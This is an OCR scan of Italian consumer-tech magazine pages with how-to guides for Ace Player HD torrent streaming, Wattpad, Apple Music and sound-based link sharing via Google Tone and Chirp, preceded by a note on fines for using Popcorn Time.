tecnologiche e' punito... con la san¬ 
zione amministrativa pecuniaria di 
euro 154 e con le sanzioni accessorie 


della confisca del materiale e della 
pubblicazione del provvedimento su 
un giornale quotidiano a diffusione 
nazionale." 

Non serve essere avvocati, né fini 
giuristi per capire che se si venisse 
beccati a continuare ad utilizzare un 
software come Popcorn Time per 
godersi indisturbati film e serieTV a 
sbafo (ad esempio utilizzando DNS 
alternativi come quelli di Google o 
OpenDNS), l'apparente colpo di for¬ 
tuna, rischierebbe di trasformarsi in 
un autentico colpo di sfortuna e ci si 
ritroverebbe a pagare una multa ben 
più salata del biglietto del cinema o 
del noleggio del film su una qualsiasi 
piattaforma Online. 
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Software | Ace Player HD 


Scopriamo come guardare i video dalla rete torrent in tempo reale 

senza avviarne il download sul nostro computer! 


Film: guardali 
senza scaricarli 


Cosa ci 
occorre 

PLAYER MULTIMEDIALE 

ACE PLAYER HD 

‘ / DVD 

@a&iB 

Sito Internet: 

http://info. 

acestream.org 


I nternet è ormai il canale di distribu¬ 
zione principale per musica e video: 
traiTunes, YouTube, SpotifyeVimeo 
il PC ha sostituito televisione e impian¬ 
to stereo. Ma a volte non è così semplice 
trovare e riprodurre tutti i contenuti 
multimediali disponibili. Capita infatti 
che alcuni di questi non siano disponi¬ 


bili direttamente in un formato fruibile 
al volo e che ci sia bisogno di scaricare 
il file sul computer prima di poterlo 
eseguire. A quest’ultima categoria ap¬ 
partengono i filmati da scaricare dalla 
rete BitTorrent, probabilmente il più 
veloce protocollo di scambio file P2P 
(Peer to Peer), ma che mal si presta alla 


fruizione del contenuto in tempo reale. 
In questo caso possiamo però utilizzare 
Ace Player HD, una speciale versione 
di VLC che ci permette di “vedere” i 
torrent direttamente dalla Rete senza 
dovere attendere il completamento 
del download. Scopriamo insieme 
come fare. 




Il player delle meraviglie 

Scompattiamo l’archivio Acestream.zip (lo trovi sul DVD 
allegato alla rivista) ed eseguiamo il file che troviamo al 
suo interno per avviare l’Installazione guidata. Tra i com¬ 
ponenti aggiuntivi da installare spuntiamo la voce Browser 
Estensions e avviamo la procedura guidata con Instali. 



Colleglliamoci a Internet 


Al termine, clicchiamo Finish per testare il corretto fun¬ 
zionamento del software. Si aprirà il browser e ci verrà 
chiesto di consentire ad ace_engine.exe il collegamen¬ 
to ad Internet: clicchiamo Consenti accesso. Con Firefox e Chro- 
me clicchiamo Attiva per consentire il test. 




ATTENTI 
ALLA BANDA 


Anche se stiamo 
guardando un filmato 
torrent in streaming la 
dimensione del file non 
cambierà: per vedere 
bene il video dovremo 
avere abbastanza 
banda per scaricarlo in 
"tempo reale", cioè il 
tempo di download non 
dovrà superare la dura¬ 
ta del video. Se durante 
la riproduzione doves¬ 
sero esserci frequenti 
pause di rebuffering o 
rallentamenti, e ciò non 
fosse imputabile ad una 
mancanza di sorgenti, 
allora vuol dire che il 
file è troppo grande per 
la nostra connessione a 
Internet. Per risolverei! 
problema scegliamo un 
torrent meno pesante, 
ovvero un filmato che 
avrà bisogno di una mi¬ 
nore velocità di down¬ 
load al secondo. 


Tutto funziona correttamente 


Facciamo una piccola prova 

Clicchiamo sul pulsante Go to test in basso nella pagina 
del browser appena caricata per testare il corretto fun¬ 
zionamento del player. Verrà quindi visualizzata la pagi¬ 
na Test web player. Clicchiamo Play e ci verranno poste alcune 
semplici domande. Rispondiamo per proseguire. 


a ll player inizierà a scaricare un filmato d’esempio e a 
riempire il buffer. Giusto qualche istante dopo, o poco 
più a seconda della connessione Internet di cui dispo¬ 
niamo, partirà la riproduzione del video. Questo ci conferma che 
l’installazione del software è andata a buon fine. 
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Ace Player HD | Software | 


Così fa l'hacker O 



Inizia il divertimento 

Avviamo adesso Ace Player dal menu Start/Tutti i pro- 
grammi/Ace Stream Media di Windows. Ci troveremo 
di fronte alla familiare interfaccia di VLC 2. Infatti questo 
non è altro che un fork del diffusissimo player open source di 
VideoLan Project con l’aggiunta del supporto al torrent. 


Troviamo il video... 

Avviamo il browser e carichiamo la pagina http://tears. 
of.Steel.torrent per scaricare il file torrent di Tears of 
Steel, un video open source prodotto dal Blender Insti- 
tute. Possiamo usare ovviamente qualsiasi altro file torrent con¬ 
tenente un file video riconosciuto da Ace Player. 





...e avviamo ia riproduzione 

j Avviamo Ace Player, se non è già in esecuzione, e clic- 
i chiamo sul menu Media/Apri file: nel box di dialogo 
I selezioniamo il file torrent appena scaricato e clicchiamo 
Aprì. Dopo pochi secondi inizierà la riproduzione di uno spot 
pubblicitario e poi potremo goderci il nostro video! 


Integrazione coi browser 

Se abbiamo installato le estensioni per Firefox e Chrome 
(Passo 2), Ace Player ci permette di guardare i torrent 
direttamente dal Web come fossero video in streaming. 
Basta cliccare col tasto destro su un torrent e poi su Play Onli¬ 
ne torrent per richiamare il player integrato. 





BROWSER 

CAPRICCIOSO 

Se abbiamo installato 
il plug-in e l'estensione 
per Firefox ma il player 
integratosi blocca in 
fase di caricamento è 
perché il componente 
aggiuntivo non è attivo. 
Apriamo il pannello del¬ 
le estensioni dal menu 
Strumenti/Componenti 
aggiuntive, spostiamoci 
nella sezione Plugins 
e attiviamo la voce 
Sempre attivo per Ace 
Stream P2P Multimedia 
Plug-in. Quindi, riavvia¬ 
mo il browser. 


CONTROLLIAMO 
COSA FA ACE 
PLAYER 


Possiamo controllare in 
tempo reale l'uso della 
banda da parte di Ace 
Player grazie all'icona 
di Ace Stream HD nella 
System tray di Windows. 
Posizioniamo la freccia 
del mouse al di sopra 
dell'icona perfarappa- 
rireil popup con tutte 
le statistiche di utilizzo 
del protocollo torrent. 
Da qui possiamo con¬ 
trollare quanta banda 
Ace sta utilizzando, 
sia in download sia in 
upload, e il numero di 
sorgenti dal quale stia¬ 
mo scaricando. 







Guardiamo i torrent dal Web 


0 | Se poi il sito che rende disponibile il torrent supporta 
direttamente Ace Player verrà visualizzato un comodo 
■ pulsante Play Online: basterà cliccarci sopra per avvia¬ 
re automaticamente la riproduzione in tempo reale del video, 
proprio come se fosse pubblicato su YouTube o Vimeo. 


Eliminiamo la pubblicità 

E | Ace Player propone spot pubblicitari prima del video o 
j] dopo una pausa. Per eliminarli dobbiamo registrarci: 
m clicchiamo Disable ads, inseriamo la nostra e-mail, 
spuntiamo / agree e clicchiamo Register. Inseriamo il codice 
inviatoci via e-mail e seguiamo la procedura di registrazione! 
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C Così fa Thacker 


Libri gratuiti sul social network 


Ti sveliamo il canale segreto dove leggere senza limiti 

e pubblicare le tue opere per condividerle con chiunque 


Libri gratuiti sul 
social network 


Cosa ci 
occorre ™ lL j> 


COMMUNITY 

LETTERARIA 

WATTPAD 

Quanto costa: Gratuita 
Sito Internet: 

www.wattpad.com 


TABLET ANDROID 

ASUS 

FONEPAD 7 

Quanto costa: € 149,oo 
Sito Internet: 
www.asus.it 


S pesso ci si ritrova a spegnere i pro¬ 
pri sogni solo perché non si han¬ 
no i mezzi a disposizione per re¬ 
alizzarli. Quanti di noi hanno sperato 
di poter un giorno pubblicare un pro¬ 
prio racconto e vederlo messo accan¬ 
to ai grandi della letteratura moder¬ 
na? Le porte sbattute in faccia nella 
vita sono tante, ma di frequente In¬ 
ternet offre un'opportunità a chi non 
può permettersela. Scordiamoci, dun¬ 
que, editori lestofanti pronti a lucrare 
sulle nostre abilità letterarie: nell'era 
del Web 2.0, infatti, diventare scrittori 
di fama mondiale restando seduti co¬ 
modamente a casa propria non è poi 
così impossibile. 


Ce n'è per tutti i gusti 

Perfare ciò basta avere una buona sto¬ 
ria per le mani e iscriversi a Wattpad, 
l'innovativa community letteraria che 
mette in comunicazione ogni giorno 
milioni di autori in erba vogliosi di far¬ 
si leggere. Sono già numerosi i casi di 
scrittori che, grazie all'app in questio¬ 
ne, hanno strappato contratti multimi¬ 
lionari a famose case editrici. Bisogna 
dire, però, che non tutti hanno vellei¬ 
tà artistiche e ci sono molti utenti che 
più che scrivere hanno solo voglia di 
leggere qualche buon racconto, maga¬ 
ri senza sborsare soldi. Tutto questo è 
possibile utilizzando sempre Wattpad, 
che può vantare più di 100 milioni di 


storie da leggere nel suo database e 
oltre 40 milioni di Wattpadders (auto¬ 
ri). Il sito è davvero molto fornito e so¬ 
vente capita di imbattersi anche in ti¬ 
toli ancora sotto la copertura del copy¬ 
right e quindi illegalmente immessi sul¬ 
la piattaforma. Wattpad è multipiatta- 
forma, quindi ci permetterà di leggere 
racconti a costo zero sia dal tablet sia 
dal PC. I libri sono qualcosa di magico 
e indubbiamente il cartaceo continua 
a esercitare un certo fascino su molti 
accaniti lettori, ma di certo non si può 
cestinare a priori la grande opportu¬ 
nità di poter divorare i nostri bestsel¬ 
ler preferiti dal telefonino e in manie¬ 
ra totalmente gratuita. Buona lettura! 


Registriamoci al servizio 

Per usare tutte le funzionalità di Wattpad dobbiamo anzitutto eseguire una semplice 
procedura di iscrizione completamente gratuita! Vediamo come farlo col nostro tablet. 



^ Iscriversi con Facebook... 

Avviata l’app, cucchiamo Continua per essere reindi¬ 
rizzati su Facebook dove, cuccando 0K, verremo rein¬ 
dirizzati ancora una volta all’app di Wattpad per scegliere tra 
alcuni titoli quelli che corrispondono di più ai nostri gusti. Infi¬ 
ne ci verrà chiesto di invitare al servizio nuovi amici tramite 
Twitter, messaggio, e-mail o lo stesso Facebook. 


-x ...peonia propria e-mail 

In alternativa possiamo compilare il form posto nel¬ 
la prima schermata dell’app. Una volta inseriti e-mail, 
username e password, ci basterà tappare sul pulsante Acce¬ 
di e poi Iscriviti. Dovremo quindi entrare nella nostra mailbox 
per confermare l’iscrizione, dopodiché potremo cominciare a 
pubblicare contenuti o a leggere gli scritti altrui. 



LIBRI GRATIS 
ANCHE SUL PC 


Wattpad è multipiatta- 
forma e ben si adatta 
alle esigenze di ogni 
utente. Non sempre, 
infatti, le persone 
amano utilizzare le 
piattaforme mobile. 

C'è comunque chi è 
ancora legato al vecchio 
computer: per questo 
Wattpad è disponibile 
nella modalità desktop 
che implementa tutte le 
funzioni dell'app. L'in¬ 
terfaccia è molto intui¬ 
tiva: una volta loggati, 
ci troviamo davanti la 
schermata iniziale con 
le storie e i "Wattpad¬ 
ders" consigliati. In 
alto a sinistra grazie al 
tasto Scopri potremo 
dare un'occhiata ai testi 
presenti in Wattpad in 
base alla loro categoria. 
Cliccando Crea, invece, 
potremo caricare il 
nostro racconto, men¬ 
tre con Community 
potremo monitorare i 
vari concorsi di scrittura 
indetti nell'app. 
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Libri gratuiti sul social network 


Così fa l'hacker C* 


E Leggiamo gratis col tablet 81® 


Ecco la guida pratica per usare ai meglio l’app di Wattpad: potremo creare una biblioteca 
personale, leggere i bestseller preferiti ovunque ci troviamo 


;i troviamo e condividere i libri con la community. 



^ Personalizzare la schermata principale 

Una volta loggati, ci ritroveremo nella schermata principale, 
dove cl sono i libri di tendenza. Per “indirizzare” la scherma¬ 
ta iniziale in base ai nostri gusti letterari tocchiamo il tasto Catego¬ 
rie e scegliamo quella desiderata. Per cercare un testo da leggere, 
tappiamo sulla lente in alto a destra e digitiamo il nome del libro. 



i prometti iposi 


^ Cercare testi e condividerli 

Con la barra di ricerca potremo ispezionare storie, persone ed 
elenchi di lettura corrispondenti al nome digitato. Sul tablet 
compariranno i vari testi con copertina e breve intra: trascinando a 
sinistra il romanzo prescelto ci verrà data l'opportunità di salvare il 
racconto nella nostra biblioteca o condividerlo tramite altri social. 


capitolo t 


U dal doppilo eh tnr Fruì tsrrratt. tn wfa «pomp a r» « t 
HKyt uUta- inni eit*i al |nmw punta M 


^ Leggere è semplicissimo 

Toccando la copertina del racconto comparirà la scherma¬ 
ta principale del testo con varie informazioni, come la data 
di pubblicazione, le parti in cui è suddiviso il testo, le visualizzazio¬ 
ni, i voti positivi e i commenti. Poco sotto il titolo c'è il tasto Leggi. 
basterà toccarlo per cominciare il nostro viaggio nel racconto scelto. 


Da un capitolo all’altro 

4 Aperto il racconto, dal menu a tendina in alto al centro sce¬ 
gliamo il capitolo che ci interessa. Toccando Carattere potre¬ 
mo modificare colore e luminosità e carattere del libro. In basso il cer¬ 
chio verde indica lo stato di progresso di lettura. Cominciata la visio¬ 
ne del libro, le due barre spariranno lasciando spazio solo al testo. 



WATTPAD TIENE 
IL SEGNO 

Non preoccupiamoci di 
tenere il segno fin dove 
siamo arrivati a legge¬ 
re. L'app, infatti, salverà 
in automatico l'ultima 
pagina visualizzata per 
ogni testo e, una volta 
riaperto Wattpad, ci 
basterà semplicemente 
cliccare sul libro prescel¬ 
to per ritrovarci a leg¬ 
gere da dove avevamo 
lasciato. 

UNA COMMUNITY 
ATTIVA 

Wattpad è anche molto 
social. Il consiglio è 
quello di monitorare 
sempre le attività dei 
nostri followers e dei 
following. Tramite il 
secondo tasto in basso, 
partendo da destra, 
potremo infatti con¬ 
trollare in qualunque 
momento le attività di 
altri utenti e scambiarci 
addirittura messaggi 
privati con alcuni di 
questi. 

CARICHIAMO! 
NOSTRI TESTI 

Wattpad è anche un edi¬ 
tor per giovani autori in 
erba. Se siamo tra quel¬ 
le persone che vogliono 
sfruttare l'app per far 
conoscere al pubblico 
le proprie velleità arti¬ 
stiche allora il consiglio 
è quello di toccare sui 
tasto con la matita re¬ 
clinata. Ci ritroveremo 
davanti una schermata 
abbastanza intuitiva 
e ci verrà chiesto di 
inserire la foto della 
copertina, il titolo della 
storia e una breve in¬ 
troduzione, dopodiché 
verremo reindirizzati in 
una nuova pagina in cui 
dovremo mettere nome 
del capitolo e testo. 


^ Arricchiamo la biblioteca 

Mentre stiamo leggendo un libro potremo con un solo tap 
far riapparire le due barre sullo schermo. In basso a destra, 
grazie al pulsante +, potremo aggiungere il racconto alla nostra 
biblioteca e con gli altri due pulsanti potremo commentare positiva- 
mente il testo oppure condividerlo con i nostri amici tramite social. 


^ Un libro al giorno 

Qualunque sia la nostra scelta, i testi salvati andranno a finire 
automaticamente nella nostra personale biblioteca. Per acce¬ 
dervi basterà premere sul secondo pulsante in basso nell’interfaccia 
dell’app partendo da sinistra per ritrovarci dinanzi tutti i libri dai noi 
scelti, con tanto di stato di progresso lettura sotto ogni copertina. 
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O Così fa Thacker 


Fai il pieno di musica gratis | 


Ecco come accedere al nuovo servizio Apple Music per ascoltare 

tutte le hit del momento su PC. tablet e smartphone 


Fai il pieno 
di musica gratis 


Cosa ci 
occorre : ACL f> 


CLOUD MUSIC 

APPLE MUSIC 

Quanto costa: 

gratuito per 3 mesi 

Sito Internet: 

http://www.apple. 

com/it/music/ 


C on Apple Music la casa della Mela lan¬ 
cia il suo servizio di streaming musicale 
anti-Spotify che può essere utilizzato da 
iPhone, iPad, iPod Touch, PC e Mac: in futuro 
sarà disponibile anche per Android. In pochi 
giorni sono stati oltre 10 milioni gli utenti re¬ 
gistrati al nuovo servizio che può essere pro¬ 
vato gratuitamente per 3 mesi, trascorsi i quali 
si attiva l'abbonamento a 9,99 euro al mese. È 
disponibile anche un piano per la famiglia a € 
14,99 euro al mese che ne consente l'uso fino a 


6 persone. Apple Music permette di accedere 
liberamente a una libreria musicale di milioni 
di brani e integra la funzione per l'ascolto off- 
line e la sincronizzazione della propria libre¬ 
ria con iCIoud. Si integra con Siri, l'assistente 
personale dei dispositivi iOS, ed è in grado di 
suggerire la musica in base ai nostri gusti. In 
pratica il servizio riesce ad apprendere le no¬ 
stre preferenze musicali a seconda dell'uso che 
ne facciamo, così da suggerirci sempre nuo¬ 
ve proposte in linea con ciò che ci piace. Più 


lo usiamo, più l'algoritmo di Apple riesce a la¬ 
vorare meglio. A tutto questo aggiunge il so¬ 
cial network Connect che consente di seguire 
i propri artisti preferiti che condividono sulla 
piattaforma video e clip esclusive, e la sezione 
Radio, da cui è possibile ascoltare in streaming 
le Web Radio con la musica scelta dai miglio¬ 
ri DJ. Non stai nella pelle e anche tu vuoi pro¬ 
vare il nuovo Apple Music? Con i nostri truc¬ 
chi puoi usarlo al meglio e sfruttarne tutte le 
funzioni nascoste. 



ATTIVAZIONE DA 
IPHONE 0 IPAD 


Per usare il servizio su iPhone, iPad o iPod Touch 
assicurati di aver aggiornato il dispositivo ad iOS 
8.4 o superiore. Awia l’app Musica. Se non ti 
viene mostrato il messaggio per attivare Ap¬ 
ple Music, tocca Per te e conferma con Inizia 
la prova gratuita di 3 mesi. Seleziona il tipo di 
membership (individuale o per la famiglia). Se¬ 
gui i passi e completa l’attivazione col tuo Ap¬ 
ple ID. Potrebbe essere richiesta una carta di 
credito, utile per il rinnovo automatico trascor¬ 
si i tre mesi di prova gratuita. 


f 


INIZIA LA PROVA GRATUITA DI 3 MESI 




NO GRAZIE 





0 ATTIVAZIONE DA PC 

w Apple Music può essere utilizzato anche 
da PC o Mac. Avvia iTunes (www.apple.com/it/ 
itunes/download): assicurati di aver installato 
la versione più recente cuccando sul pulsante 
col punto interrogativo e selezionando I Verifica 
aggiornamenti. Clicca sull'icona Musica in al¬ 
to a sinistra e vai nella sezione Per te. Clicca 


(7\ TROVA LA MUSICA 
V CHE TI PIACE 

Per aiutare Apple Music a scovare la musica che ti piace, vai in Per 
fe.Tocca una volta i generi musicali cheti piacciono, due volte quelli 
che ami veramente; se qualcuno non ti piace, tienilo premuto per 
farlo scomparire. Prosegui con Avanti e seleziona ora gli artisti 
che ti piacciono. Per mostrarne di più tocca Altri artisti- al termine 
tocca Fine. L'app creerà automaticamente delle playlist in base ai 
tuoi gusti musicali che potrai iniziare ad ascoltare. 


••ooo 3 ITA T 20:55 t 86% • 

(J) Avanti Q 

Dicci cosa ti piace di più. 

Tocca una volta i generi che ti piacciono, due volte 
quelli che ami. Tieni premuti quelli che non ti piacciono. 



su Inizia la prova gratuita di 3 mesi e prose¬ 
gui per completare l’attivazione (come su iOS). 



BLOCCA IL RINNOVO 
AUTOMATICO 


Al termine dei tre mesi di prova, Apple Music si 
rinnoverà automaticamente addebitando il co¬ 
sto dell’abbonamento mensile sulla tua carta di 



credito. Per impedire che ciò awenga, dall’app 
Musica tocca l’icona con l’omino in alto a sini¬ 
stra, vai in Visualizza ID Apple e fai tap su Ge¬ 
stisci in Abbonamenti. Metti su OFFI’opzione 
Rinnovo automatico e conferma con Disatti¬ 
va. Sarà comunque possibile riattivare il rinno¬ 
vo automatico in qualsiasi momento ripetendo 
la stessa procedura. 

(7) NUOVI SUGGERIMENTI 

▼ Più usi Apple Music, più lui imparerà a 
conoscerti, suggerendoti la musica da ascol¬ 
tare. Per mostrare ulteriori suggerimenti ba¬ 
sta trascinare l’elenco verso il basso, come 
quando si vuole aggiornare la posta in arrivo in 
Mail. Se invece una delle proposte non è di tuo 


Aggiungi in coda 
Rendi disponibile offline 
4on mi piace questo suggerimento 
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Fai il pieno di musica gratis | 


Così fa l'hacker 


gradimento, toccala e tieni premuto il dito per 
visualizzare il menu nascosto e poi selezionare 
Non mi piace questo suggerimento. 

(f) NAVIGA MENTRE 
V ASCOLTI 

Quando sei nella schermata di riproduzione, 
puoi continuare a navigare in Apple Music con¬ 
tinuando ad ascoltare la musica: basta toccare 
la piccola freccia verso il basso, mostrata in al¬ 
to a sinistra. Il tasto +ti permette di aggiunge¬ 
re la musica alla libreria, mentre quello a for¬ 
ma di cuore non serve per aggiungere un pre¬ 
ferito ma per dire all’app che quella musica ti 
piace, in modo da aiutarla a capire i tuoi gusti. 




RIORDINA L’ELENCO 
DI RIPRODUZIONE 


Quando trovi una canzone che vuoi aggiungere 
alla lista di riproduzione, basta toccare il simbo¬ 
lo con i tre puntini e scegliere Aggiungi in coda 
Dalla finestra In coda puoi visualizzare l’elen¬ 
co dei brani presenti nella lista di riproduzione. 
Da qui puoi cancellare la lista o aggiungere al¬ 
tri brani. Per modificare l’ordine con il quale i 
brani verranno riprodotti, invece, tocca l'icona 
hamburger di ogni canzone e trascina verso 
l’alto o verso il basso. 


| Shake Your Hips 

<1 CODA. 3 SMANI 

Surfing On a Rocket 
Cherry Blossom Girl 

lf* r. 


IN BREVE 


SVEGLIA 
ASUON 
DI MUSICA 


Puoi usare i bra¬ 
ni che hai in Apple 
Music come allar¬ 
me per la sveglia. 
Per farlo, apri l’app 
Orologio, tocca il ta¬ 
sto + per aggiunge¬ 
re la nuova sveglia e 
vai in Suoni. Basta 
un tocco su Scegli 
un brano per acce¬ 
dere al proprio cata¬ 
logo musicale e se¬ 
lezionare la canzone 


MUSICA 
IN 3G/4G 


Usare Apple Music 
con la connessio¬ 
ne 3G/4G potrebbe 
consumare veloce¬ 
mente il traffico da¬ 
ti a disposizione; per 
questo, per imposta¬ 
zione predefinita, è 
attivo il blocco per 
l’uso solo via Wi-Fi. 
Se, però, puoi ascol¬ 
tare la musica anche 
fuori casa, vai in Im- 
postazioni/Musicae 
metti su On l’opzio¬ 
ne Usa dati cellula¬ 
ri presente in Play¬ 
back &Downloads.. 


@) RIPRODUZIONE 
V OFF-LINE 

Puoi ascoltare la musica in modalità off-line, sca¬ 
ricandola sul dispositivo quando sei connesso 
in Wi-Fi! Tocca l’icona con i tre puntini e sele¬ 
ziona Rendi disponibile off line. In questo modo 
potrai ascoltare musica anche senza una con¬ 
nessione dati o evitando di consumare il traffi¬ 
co dati 3G/4G. Per visualizzare i brani scaricati 
sul telefonino vai nella sezione Musica, tocca il 
selettore della categoria ( Artisti , Album, Brani 
e altro) e metti su On il selettore Mostra brani 
disponibili offline: in questo modo saranno vi¬ 
sualizzati solo i brani salvati nella memoria del 



device. Per liberare spazio, si possono elimina¬ 
re i brani toccando il simbolo con i tre puntini e 
selezionando Rimuovili download. 



CONNETTITI Al TUOI 
ARTISTI PREFERITI 


Apple Music ti permette di seguire le attività 
dei tuoi artisti preferiti. I contenuti condivisi da¬ 
gli artisti vengono mostrati nella scheda Con- 
nect. Per visualizzare quali artisti stai seguen¬ 
do tocca I Vedi chi stai seguendo. Per impo¬ 
stazione predefinita vengono inseriti tutti quel¬ 
li di cui aggiungi un brano nella libreria musi¬ 
cale. Puoi però disabilitare questa opzione in 
modo da seguire solo quelli che ti interessano 
davvero. Per rimuoverne uno dalla lista, tocca 
il pulsante Non seguire più. 




MODIFICA LA MUSICA 
CHE TI PIACE 


Se hai cambiato gusti e non ti piacciono più i 
generi che hai fatto imparare ad Apple Music, 
puoi cambiarli. Per farlo, vai in Per te e tocca 
l'icona con l’omino in alto a sinistra. Seleziona 
Scegli artisti per te e tocca Ripristina se vuoi 


azzerare le tue selezioni, oppure usa i cerchi per 
aggiungere altri generi e artisti. 



SCOPRI DI PIU 
DELL’ARTISTA 


Se stai ascoltando un brano di una playlist e 
vuoi conoscere più informazioni su album, ar¬ 
tista e altro, apri la lista di riproduzione e tocca 
il tasto con i tre punti a destra della canzone. In 
cima al menu nascosto viene mostrata la co¬ 
pertina dell’album col nome dell’artista. Tocca 
sulla freccia verso destra per visualizzare mag¬ 
giori informazioni ed eventualmente aggiunger¬ 
lo alla libreria. 




One More Time 

Disco vwy 




Riproduci come successivo 


0 RIMUOVI CONNECT 

v In Apple Music è stato introdotto il so¬ 
cial network Connect, che consente di seguire 
i propri artisti preferiti. Se non ti interessa, puoi 
rimuoverlo andando in Impostazioni/Generali/ 
Restrizioni e disabilitando l’opzione Apple Mu¬ 
sic (Connect). Sull'iPad, che ha uno schermo più 
grande, questa azione servirà a far scomparire 
l’icona Connect dalla barra in basso. Sull’iPho- 
ne, invece, la sostituirà con Playlistche era sta¬ 
ta rimossa proprio per far spazio a Connect. 



(t) I TESTI ALL'INTERNO 
¥ DEL CENTRO NOTIFICHE 

Vuoi usare Apple Music come una sorta di karaoke e cantare a squarciagola sui tuoi brani 
preferiti? Dall'App Store installa l'app gratuita MusixMatch. Aprì il Centro notifiche e 
dalla scheda Oggi scorri fino in basso e fai tap su Modifica. Cerca le applicazioni pre¬ 
senti etocca il segno + in 
corrispondenza di Musi¬ 
xMatch per aggiungerla 
e spostarla in alto.Tocca 
Fine per completare. 
Ora vai in Musica e avvia 
la riproduzione dei bra¬ 
ni: accedendo al Centro 
notifiche visualizzerai i 
testi sincronizzati con le 
canzoni. 


M Musixmatch 

The Lost Song, Pt. 3 


Tonight, in my mind's eye 

I need you to hold on 
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C Così fa Thacker 


Faldate | Il passepartout musicale! 


Il passepartout 
musicale! 

C’è un modo sconosciuto ai più per comandare a 
distanza computer e smartphone altrui utilizzando 
la voce e i suoni. Provare per credere 


Cosa ci ^3 
occorre 

ESTENSIONE PER 
GOOGLE CHROME 

GOOGLE TONE 

Quanto costa: Gratuita 
Sito Internet: https:// 
chrome.google.com 


APP ANDROID 

CHIRP 

Quanto costa: Gratuita 
Sito Internet: 

https://play.google.com 


SOFTWARE 
PER LE GESTURE 

FLUTTER 

Lo trovi su: S'DVD 


S e esiste una prerogativa di 
Internet dall'avvento di 
quest’ultima nelle nostre 
case, è sicuramente la condivisio¬ 
ne, Il fenomeno dello sharing, la 
compulsiva dipendenza derivante 
dall’utilizzo di Internet è ciò che 
più ha cambiato le vite di tutti, 
forse anche più della rete stessa. 
La potenza, quindi, sprigionata da 


questo strumento va sempre più al 
di là delle nostre aspettative, tan¬ 
to anche dietro questo strumento 
possono nascondersi minacce in¬ 
formatiche di cui non conosciamo 
neanche la natura. Con le appli¬ 
cazioni giuste basta una semplice 
coppia di altoparlanti per PC per 
condividere e scambiare tramite la 
musica informazioni sensibili (ad 


esempio le pagine Web visitate) con 
altri computer 

La nuova era dello sharing 

Chiunque abbia un PC conosce Go- 
ogle, un po’ perché è il compagno 
fedele di ogni internauta e un po' 
perché fornisce gratuitamente una 
tale quantità di servizi dai quali è 
difficile staccarsi. In pochi però 


Ti entro nel PC con un suono! 

Grazie all’app Google Tone di Chrome possiamo prendere il comando del browser di qualsiasi computer 
semplicemente facendo riprodurre agli altoparlanti una sequenza di note. 



Goog»e Tane 

Prova Google Tone ora. 


* 

gSPk. 

!__ M. 


o 


Google Tone 


Google Tone ha 


Vai in un'altra pagina e fai clic sul puh 


Ci basta un plugin 

La prima cosa da fare è installare un plu¬ 
gin per Chrome. Raggiungiamo lo store di 
Google da chrome.google.com/webstore e cer¬ 
chiamo, nel tab di ricerca, google tone. Clicchia- 
mo in alto a destra il pulsante Aggiungi a Chro¬ 
me per avviare il download e l’installazione. 


^ Pronti a trasmettere! 

Ai nostri "vicini” che hanno Chrome aper¬ 
to e il plugin installato, possiamo inviare 
un link di qualunque sito. Basterà visitare una 
pagina Web e quando vogliamo condividerla clic- 
chiamo sul tasto in alto a destra a forma di mega¬ 
fono: occhio ad alzare al massimo il volume! 


^ Beep beep, il link è servito 

Se tutto è OK, riceveremo un avviso che 
ci notifica che il link è stato “suonato” 
correttamente. Questo non avviene sempre, capi¬ 
terà soprattutto dopo i primi beep condivisi. Non 
resta quindi che divertirci scambiando link diver¬ 
tenti con chiunque sia “a portata d’orecchio”. 
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vogliamo condividere con tutti. 
Bene, alziamo il volume del nostro 
PC e premiamo il pulsante Tone: 
una melodia verrà letteralmente 
ascoltata da tutti i computer nel¬ 
le vicinanze che apriranno come 
per magia proprio la pagina Web 
che abbiamo condiviso! Google 
per ora si è limitata nel permette¬ 
re la condivisione di siti Web, ma 
non è escluso che in futuro, viste 
le potenzialità, si possa anche con¬ 
dividere altro, con gli sviluppo che 


sanno quanto l’azienda sia un'in¬ 
cubatrice di progetti avanguardi- 
stici, quasi sconfinanti nella fan¬ 
tascienza: da questi, però, spesso 
nascono e si evolvono soluzioni 
che ci cambiano il modo di co¬ 
municare. Un esempio? Google 
Tone. Questa funzione 
si presenta come 
un "banale" 
plug-in da 


installare nel browser Chrome, 
ma racchiude una potenziali¬ 
tà realizzata in maniera tanto 
semplice quanto geniale. Ve¬ 
diamo un caso d’uso. Siamo in uf¬ 
ficio, tutti i nostri colleghi hanno 
Chrome in esecuzione col plug-in 
Tone installato e siamo su 
una pagina Web che 





ANCHE CON IL KINECT PUOI COMANDARE IL PC CON LA VOCE! 


Una delle funzioni interessanti del nuovo sensore 
Kinect 2 di Microsoft è che consente utilizzare la voce 
per eseguire delle azioni. Si possono infatti awiarefilm, 
brani, fare ricerche on-line ed eseguire applicazioni. Il 
dispositivo permette anche di controllare tutto con 
le mani con una precisione al millimetro, eseguendo 
semplici gesture anche personalizzabili. Quanto alle 
caratteristiche tecniche, a differenza del modello 
precedente, Kinect 2 per Windows può registrare 
video nel formato FullHD a 1080p, offre una maggiore 
profondità di campo, una migliore fedeltà cromatica 
e un tracciamento dello scheletro più preciso. Inoltre 


consente all'utente di ridurre la distanza dal sensore, 
rendendone possibile l'uso in stanze di piccole dimen¬ 
sioni. Infine, il sensore IR può rilevare adesso le gesture 
degli utenti anche in condizioni di bassa illuminazione. 


Esiste una versione apposita per PC, oltre a quella 
nativa per Xbox One, con la quale si può interagire 
col sistema operativo Microsoft dimenticandosi di 
mouse e tastiera. 




Bi TELECAMERA RGB O EMETTITORI INFRAROSSI 

E3 SENSORI DI PROFONDITÀ E1 SPIA ACCENSIONE 

E1 MICROFONI 


Le funzioni del sensore Kinect 2 di Microsoft sono implementate 
grazie a una serie di dispositivi e componenti elettronici che rilevano 
movimento e suoni. Eccoli nel dettaglio. 
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Faldate | Il passepartout musicale! 


Scambio file a colpi di bip! 

Ecco il trucco per condividere tramite i suoni immagini, video, appunti e link utilizzando i dispositivi mobile. 


chirp.io 


Chirp 


INSTALLA 


0 o o 





Una veloce installazione 

■J Iniziamo con scaricare l'applicazione su 
smartphone o tablet Android (ma è dispo¬ 
nibile anche per iOS). Apriamo il PlayStore di Goo- 
gle e cerchiamo chirp tramite la barra delle ricer¬ 
che. Non ci resta ora che toccare su INSTALLA 
per awiare il download e l'installazione dell'app. 


Un’interfaccia semplice e 

intuitiva 

Una volta installato, apriamo Chirp: l’appli¬ 
cazione si presenta con un'interfaccia molto ami¬ 
chevole mostrando in primo piano dei pulsanti che 
ci faranno condividere con dei suoni diverse cate¬ 
gorie di file, dalle foto ai link. 


-a Condividiamo un’immagine 

Dall'Interfaccia principale tocchiamo + nel¬ 
